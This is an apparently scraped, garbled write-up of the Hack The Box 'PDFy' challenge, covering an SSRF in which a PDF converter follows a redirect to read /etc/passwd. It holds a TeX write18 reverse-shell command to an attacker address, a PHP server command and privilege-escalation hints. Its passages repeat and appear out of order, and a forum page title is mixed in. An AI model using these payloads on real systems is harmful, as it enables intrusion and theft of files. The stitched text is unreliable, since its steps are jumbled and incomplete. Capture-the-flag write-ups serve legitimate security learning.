Pdfy Htb Writeup Upd -

Input the URL of your hosted redirect script into the PDFy web form (e.g., http://your-server-ip/index.php ). The PDFy server sends a request to your server.

[Attacker] ---> Post URL (Exploit Server) ---> [PDFy Web Server] | Follows 302 Redirect v [Attacker Flag] <--- Generates PDF <--- Reads file:///etc/passwd 🔍 Step 1: Initial Reconnaissance & Code Review

Official PDFy Discussion - Page 2 - Challenges - Hack The Box pdfy htb writeup upd

Look for pdftex or tex . If pdftex is SUID root or you can run it as sudo, exploit it.

Note: Ensure your web host does not insert browser warning pages, as this disrupts the tool's flow. Step 2: Triggering Execution Input the URL of your hosted redirect script

\immediate\write18/bin/bash -c "bash -i >& /dev/tcp/10.10.14.XX/5555 0>&1"

Start a lightweight PHP server on your exploitation node to serve the script: php -S 0.0.0.0:8080 Use code with caution. Step 3: Triggering the SSRF Payload If pdftex is SUID root or you can run it as sudo, exploit it

Read local files (like /etc/passwd ) using the server's internal access. Step-by-Step Walkthrough Reconnaissance & Identification The web interface accepts a URL to convert to PDF. The backend often uses wkhtmltopdf to render the content.